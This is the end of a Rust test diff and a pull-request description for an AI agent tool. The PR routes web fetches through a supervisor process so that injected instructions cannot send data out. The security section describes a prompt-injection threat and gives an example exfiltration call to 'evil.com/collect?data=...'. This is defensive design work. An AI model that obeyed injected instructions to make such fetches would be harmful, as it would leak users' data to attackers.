+                url: "https://example.com/".into(),
+                max_body_chars: Some(4096),
+            }),
+        };
+
+        let mut buf: Vec<u8> = Vec::new();
+        send(&mut buf, &req).await.unwrap();
+
+        // The serialized form must end with exactly one newline.
+        assert_eq!(buf.last(), Some(&b'\n'));
+        // No embedded newlines (valid JSON-lines invariant).
+        assert_eq!(buf.iter().filter(|&&b| b == b'\n').count(), 1);
+
+        let mut reader = BufReader::new(buf.as_slice());
+        let decoded: IpcRequest = recv(&mut reader).await.unwrap();
+        assert_eq!(decoded.req_id, req.req_id);
+        match decoded.body {
+            IpcRequestBody::Fetch(f) => {
+                assert_eq!(f.url, "https://example.com/");
+                assert_eq!(f.max_body_chars, Some(4096));
+            }
+            _ => panic!("wrong body variant"),
+        }
+    }
+
+    /// `recv` returns an error when the stream is empty.
+    #[tokio::test]
+    async fn recv_on_empty_stream_errors() {
+        let empty: &[u8] = &[];
+        let mut reader = BufReader::new(empty);
+        let result: anyhow::Result<IpcRequest> = recv(&mut reader).await;
+        assert!(result.is_err(), "expected error on empty stream");
+    }
+}


### PR DESCRIPTION
## Summary

Phase 1 of the supervisor/worker split described in #884.

Closes partial progress on #884.

## What this adds

### New crate: `koda-ipc`

Minimal IPC protocol for supervisor ↔ worker communication over Unix domain sockets with newline-delimited JSON framing.

```
koda-ipc/
  message.rs    — typed request/response enums (Fetch, Shutdown + acks)
  transport.rs  — JSON-lines send/recv over any AsyncRead/AsyncWrite
  client.rs     — worker-side fetch() helper + supervisor_socket_path()
```

Protocol is versioned (`PROTOCOL_VERSION = 1`) with a handshake so mismatched builds fail loudly.

### `koda-cli`: IpcSupervisor

New RAII guard that binds a Unix domain socket and serves fetch requests from sandboxed workers:

- `bind()` → generates a UUID socket path, sets `KODA_SUPERVISOR_SOCKET` in env
- `bind_at()` → binds at a specific path without touching env (used by tests)
- `Drop` removes the socket file and unsets the env var
- `SocketEnvGuard` prevents `do_fetch()` from recursing into IPC

URL validation is applied at the **supervisor level** (`is_safe_url()`) so the worker cannot bypass SSRF protection even if compromised by prompt injection. The worker is never trusted to have pre-validated URLs.

Server startup (`run_stdio_server`) now calls `IpcSupervisor::bind()` so any worker spawned in a future commit automatically inherits the socket path via environment.

### `koda-core`: WebFetch IPC routing

`web_fetch()` now checks `KODA_SUPERVISOR_SOCKET` at call time. When set, all HTTP fetch requests route through the supervisor over IPC instead of opening direct sockets:

```rust
// Worker side — no direct network socket opened
if let Some(sock) = koda_ipc::client::supervisor_socket_path() {
    let body = koda_ipc::client::fetch(&sock, url, Some(max_body_chars)).await?;
    return Ok(body);
}
// Direct path (non-sandboxed) ...
```

`is_safe_url()` and `is_safe_ip()` promoted from `pub(crate)` to `pub` so the supervisor can apply the same validation logic.

## Security model

The key threat this addresses: **prompt injection via WebFetch exfiltration**.

Before this PR, if the agent was instructed (via a malicious file or web page) to call `WebFetch("https://evil.com/collect?data=..."` that call ran in-process in Rust, bypassed the bash sandbox entirely, and `is_safe_url()` only blocked private IPs — not attacker-controlled public URLs.

After this PR (once OS-level network drop lands in Phase 2):

```
Worker process (no outbound sockets)
  → WebFetch → IPC message → Supervisor
                              ↓ is_safe_url() re-applied
                              ↓ audit log
                              ↓ HTTP call
                              ↓ response back over IPC
```

## Tests

- `koda-ipc`: roundtrip JSON-lines serialization, empty stream error, socket path normalization (pure, no global env state)
- `koda-cli`: bind_at lifecycle, drop cleanup, unique paths, SocketEnvGuard save/restore
- All 9 test suites pass — **0 failures, 0 warnings**

## What this does NOT include (Phase 2)

- OS-level network drop (seccomp on Linux / Seatbelt on macOS) on the worker process
- LLM API call proxying through the supervisor (worker still makes LLM calls directly)
- Worker binary / process spawning
- Task registry for overnight persistence

Phase 2 lands OS-level isolation once the LLM proxy is in place — at that point the worker process has zero outbound socket access and the exfiltration gap is fully closed.

---

See design discussion: https://github.com/lijunzh/koda/issues/884#issuecomment-4244005383